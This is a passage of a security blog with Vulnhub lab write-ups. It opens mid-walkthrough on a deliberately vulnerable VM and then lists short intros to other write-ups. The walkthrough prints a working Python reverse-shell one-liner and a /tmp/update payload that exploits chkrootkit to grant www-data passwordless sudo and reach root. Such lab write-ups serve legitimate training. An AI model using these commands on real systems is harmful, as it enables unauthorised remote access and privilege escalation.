<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7-EUWkPxeGUlxSWDiHDgqiMAeuyt9OU1yv-xvhTqvX9XNHfmQusvDyqpvlHrTfecBiABhJoiiYkvNtT0GzGtbekTQfCqUXtaDu4U3eJO44KCyLEX85phuvrFyz7GZgwExHxWwblr-a2I/s1600/1-8.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="344" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7-EUWkPxeGUlxSWDiHDgqiMAeuyt9OU1yv-xvhTqvX9XNHfmQusvDyqpvlHrTfecBiABhJoiiYkvNtT0GzGtbekTQfCqUXtaDu4U3eJO44KCyLEX85phuvrFyz7GZgwExHxWwblr-a2I/s640/1-8.png" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span>
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Sweet!! Now I can try and throw a python listener my way. I use 443 as it's a web port so less likely to be blocked:</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;">python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.8",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'</span></span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">And the result is:</span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn0wGoa901PZJowLzp_u1aEdQk9cldNetoytaHgDT72J4j7mDiBQ-H6GEQYqEEsBgviBOe25Mgc6BlR57zPxprJucY4_46N-YA5Vyu3TlwWtTme573AgZgzx_fNoDPprlvlHDrXifjWYU/s1600/1-9.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="162" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgn0wGoa901PZJowLzp_u1aEdQk9cldNetoytaHgDT72J4j7mDiBQ-H6GEQYqEEsBgviBOe25Mgc6BlR57zPxprJucY4_46N-YA5Vyu3TlwWtTme573AgZgzx_fNoDPprlvlHDrXifjWYU/s400/1-9.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<br />
Hurrah!!!</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
Now to start enumerating:</div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzKDpwOKet6dzxWtYnTy5fF7GEJyVb3U-CHPR4-4wfpOKZu0jFh4ix7by7pXGdGHdvfNgwzBn9LaIoqaS5xVfIaB57MT-ugDWO7-b45C_5RJkXUTg87jcNHh-UL2XZVYhp0lQV_Y4jEcw/s1600/1-10.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="141" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzKDpwOKet6dzxWtYnTy5fF7GEJyVb3U-CHPR4-4wfpOKZu0jFh4ix7by7pXGdGHdvfNgwzBn9LaIoqaS5xVfIaB57MT-ugDWO7-b45C_5RJkXUTg87jcNHh-UL2XZVYhp0lQV_Y4jEcw/s400/1-10.png" width="400" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Ok happy with the release details now to see if I can write anywhere:</span><br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">I can write to /tmp but when I upload my enumeration script it doesn't allow me to execute it :(</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans", sans-serif; font-size: 13px;">I start to enumerate manually and eventually find some things in the crontab:</span><br />
<span style="font-family: "open sans", sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcd8b5hoLktng7IJqGiYkzT_0-G9XT98nSzxyh9oj120JSA35_9oH5WJmokRZFqX3e_Zm-9tHFCXntNKQIlEGL46gLfx05k8EtRxjadDKlglG1aAYMNeurRzGkoM91PC-JGJiUnrR7-V0/s1600/1-11.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="208" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcd8b5hoLktng7IJqGiYkzT_0-G9XT98nSzxyh9oj120JSA35_9oH5WJmokRZFqX3e_Zm-9tHFCXntNKQIlEGL46gLfx05k8EtRxjadDKlglG1aAYMNeurRzGkoM91PC-JGJiUnrR7-V0/s400/1-11.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans", sans-serif; font-size: 13px;"><br /></span>
<span style="font-family: "open sans", sans-serif; font-size: 13px;">I'll check out the daily one:</span><br />
<span style="font-family: "open sans", sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA-1SPmQIM9eXkiHwFQ40U9Ae2eufpGSzkC721TuT_oWSQgR-ipgeOrS1Wgsqqv_J9H1DBNoxPSoThcbatJouLpjGRwQmMSQ4eJwBlRWpPTbb7-bJ7kftElYhKm_LbzsitOM-_D4NwcpI/s1600/1-12.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhA-1SPmQIM9eXkiHwFQ40U9Ae2eufpGSzkC721TuT_oWSQgR-ipgeOrS1Wgsqqv_J9H1DBNoxPSoThcbatJouLpjGRwQmMSQ4eJwBlRWpPTbb7-bJ7kftElYhKm_LbzsitOM-_D4NwcpI/s400/1-12.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans", sans-serif; font-size: 13px;"><br /></span>
<span style="font-family: "open sans", sans-serif; font-size: 13px;">Ok some stuff in here time to start looking at their code.</span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">After sifting through the code nothing jumps out at me so I revert to Google to see if the file "chkrootkit" has any flaws.</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Exploit-DB comes up trumps with this </span><a href="http:" style="font-family: "Open Sans", sans-serif; font-size: 13px;"> https://www.exploit-db.com/exploits/33899/</a></div>
<div style="text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKJZ88Z6ZRCDcPhLYNtCpBXbaZVEaOPFsIUPpB5xoZ1ivupFM4l7lOM8YJVIOLmMNhj3YQcJS4e12sqCMb9OhQ3G32j8GIhg_-iFDjscTuGO_c0_sd0qVDeAIBBw1gaVHH_oGZmdkAAp0/s1600/1-13.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="376" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKJZ88Z6ZRCDcPhLYNtCpBXbaZVEaOPFsIUPpB5xoZ1ivupFM4l7lOM8YJVIOLmMNhj3YQcJS4e12sqCMb9OhQ3G32j8GIhg_-iFDjscTuGO_c0_sd0qVDeAIBBw1gaVHH_oGZmdkAAp0/s640/1-13.png" width="640" /></a></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">Awesome!! Now to create that /tmp/update file and leverage me some privileges!!</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<a href="https://www.blogger.com/blogger.g?blogID=4115963120017667746" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><a href="https://www.blogger.com/blogger.g?blogID=4115963120017667746" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"></a><span style="font-family: "open sans" , sans-serif; font-size: 13px;">Inside the file I put:</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-size: 13px;"><span style="font-family: "courier new" , "courier" , monospace;">chmod 777 /etc/sudoers && echo "www-data ALL=NOPASSWD: ALL" >> /etc/sudoers && chmod 440 /etc/sudoers</span></span><br />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">This should give my www-data account sudo rights without a password :)</span><br />
<br style="font-family: "Open Sans", sans-serif; font-size: 13px;" />
<span style="font-family: "open sans" , sans-serif; font-size: 13px;">The cronjob runs and:</span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrLhExfUAdUZIQB5vEG_jp7_MiFe0QIP_RYXUKk1qo5tt8Oa4XWef3Om0HShSZKoACBthHIp-cDGrUXv91XgX5_Q9AHkG8f5wjthnYuiD9oXkNJE9FQroihRbEobREFo8kiCpqWQMOfYM/s1600/1-14.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="75" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrLhExfUAdUZIQB5vEG_jp7_MiFe0QIP_RYXUKk1qo5tt8Oa4XWef3Om0HShSZKoACBthHIp-cDGrUXv91XgX5_Q9AHkG8f5wjthnYuiD9oXkNJE9FQroihRbEobREFo8kiCpqWQMOfYM/s400/1-14.png" width="400" /></a></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<span style="font-family: "open sans" , sans-serif; font-size: 13px;"><br /></span></div>
<div style="text-align: left;">
<br />
I am root :) </div>
<div style="text-align: left;">
<br />
Let's see what is lurking within:</div>
<div style="text-align: left;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7X_dXmUk7DgwY0dxi2uYFpRLFdoXIqpdaxFwWZT5r06NoBLzst2Ok28jqBHiRtqS9LZydbUYhF6Km3nWRHIMDK9o_K8kllBBjQOgSb8Tj2CAfv0aiIEqDlQO5Mz75N-vF-qoKtFoRoQc/s1600/1-15.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="113" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg7X_dXmUk7DgwY0dxi2uYFpRLFdoXIqpdaxFwWZT5r06NoBLzst2Ok28jqBHiRtqS9LZydbUYhF6Km3nWRHIMDK9o_K8kllBBjQOgSb8Tj2CAfv0aiIEqDlQO5Mz75N-vF-qoKtFoRoQc/s640/1-15.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i2.kym-cdn.com/photos/images/newsfeed/000/817/310/09c.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://i2.kym-cdn.com/photos/images/newsfeed/000/817/310/09c.gif" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Phew!! This made me stretch the old grey matter!!!!</div>
<br /></div>
</div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-44141422427846247982016-10-08T12:21:00.001+01:002017-02-08T14:19:38.017+00:00Vulnuhub Tr0ll<div dir="ltr" style="text-align: left;" trbidi="on">
This is another boot2root brought to you by Vulnhub. Big thanks go out to <a href="https://twitter.com/@maleus21">maleus21</a> for creating this. I had fun with this vm and boy did it piss me off at times lol. I remembered to step back and think a bit more with this vm too (let's be honest most of the time it's dive in and "must get roooooootttttt!!!!")<br />
<br />
I am going to stop using cherry tree after this, as I am not happy about the quality it exports at.<br />
<br />
So here it is!!<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOaHNmN2dtS1M4X0U/preview" width="640"></iframe><br />
<br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com1tag:blogger.com,1999:blog-4115963120017667746.post-78568667541708996262016-10-04T23:17:00.003+01:002017-02-08T14:19:38.028+00:00Vulnhub SickOS1.1<div dir="ltr" style="text-align: left;" trbidi="on">
Vulnhub has kept me amused today as I had some free time. As this VM is based on an OSCP machine I thought I would see how I fared. Thanks again to vulnhub and <a href="https://twitter.com/@D4rk36" style="background-color: whitesmoke; color: rgb(0, 89, 144) !important; font-family: "Helvetica Neue", Helvetica, Arial, sans-serif; font-size: 14px; margin: 0px; outline: 0px;">@D4rk36</a> for making it.<br />
<br />
So here it is:<br />
<br />
<a href="https://www.vulnhub.com/entry/sickos-11,132/">https://www.vulnhub.com/entry/sickos-11,132/</a><br />
<br />
And here's my bit enjoy!!<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOWVhjb18xbk5nVWc/preview" width="640"></iframe><br />
<br />
<br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-5395455380362680732016-10-04T16:29:00.003+01:002017-02-08T14:19:38.022+00:00Vulnhub Mr-Robot 1<div dir="ltr" style="text-align: left;" trbidi="on">
First of all thanks to Jason for making this VM and for Vulnhub who host it.<br />
<br />
The URL of this is <a href="https://www.vulnhub.com/entry/mr-robot-1,151/">https://www.vulnhub.com/entry/mr-robot-1,151/</a><br />
<br />
I really enjoyed this VM as it approached things a little bit different than others in how you grab root. I did have some "fun" with latency in my VMWare and I also got some weird double echoes as well? But I managed to sort it in a very technical way of rebooting.<br />
<br />
Anyway enough of me!!<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOYVBnUlRVUUZzSTg/preview" width="640"></iframe><br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0tag:blogger.com,1999:blog-4115963120017667746.post-1743078159157860292016-09-16T15:19:00.001+01:002017-02-08T14:19:38.011+00:00Pentestit Lab v9 Writeup<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
My first epic write up!! There are some mistakes as time is something I lack :(<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOTUxUY0J3eXMxVkk/preview" width="640"></iframe><br />
<br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com1tag:blogger.com,1999:blog-4115963120017667746.post-15429245471310847522016-09-16T09:31:00.001+01:002017-02-08T14:19:38.009+00:00Vulnhub Stapler<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
Good old Vulnhub. It is a home of commendable virtual machines for folk to go and flex their hacky fingers. I quite enjoy doing them as a challenge is a challenge! Also by writing about them I get to stuff that knowledge further into my brain (that's how mine works) and it also gives me practice for report writing.<br />
<br />
I really enjoyed this VM as there are several ways to exploit it. I did 2 of them and I have left the rest for a time further down the road when the exploits etc aren't as fresh in my head.<br />
<br />
<br />
I use Cherry Tree for my note taking but unfortunately the output PDF has made the images look odd and this seems to be a quirk of it.<br />
<br />
So here's how I found the flags<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOdGttUjVjbnY5cFk/preview" width="640"></iframe><br />
<br />
<br />
After scanning the ports it was time to start finding a way to get inside. Port 21 was 1st on the scan so it was 1st on my hit list.<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOM2JWVjZ2bC1VNUE/preview" width="640"></iframe><br />
<br />
<br />
After getting nowhere with this port I moved onto the ssh port. <br />
<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOd2NYU1dBdDRFS0k/preview" width="640"></iframe><br />
<br />
<br />
This list in my enumeration of users<br />
<br />
<iframe height="480" src="https://drive.google.com/file/d/0B-nERnC5GedOaXZfZ1Q0Vi1lX0U/preview" width="640"></iframe><br />
<br />
<br />
I had a lot of fun with this vm. I love that there are individuals and groups who are willing to take the time to compile such things. So to them I salute!!<br />
<br />
That's enough from me for now :)<br />
<br />
<br />
<br />
<br />
<br /></div>
Volta Securityhttp://www.blogger.com/profile/16435992433390099875noreply@blogger.com0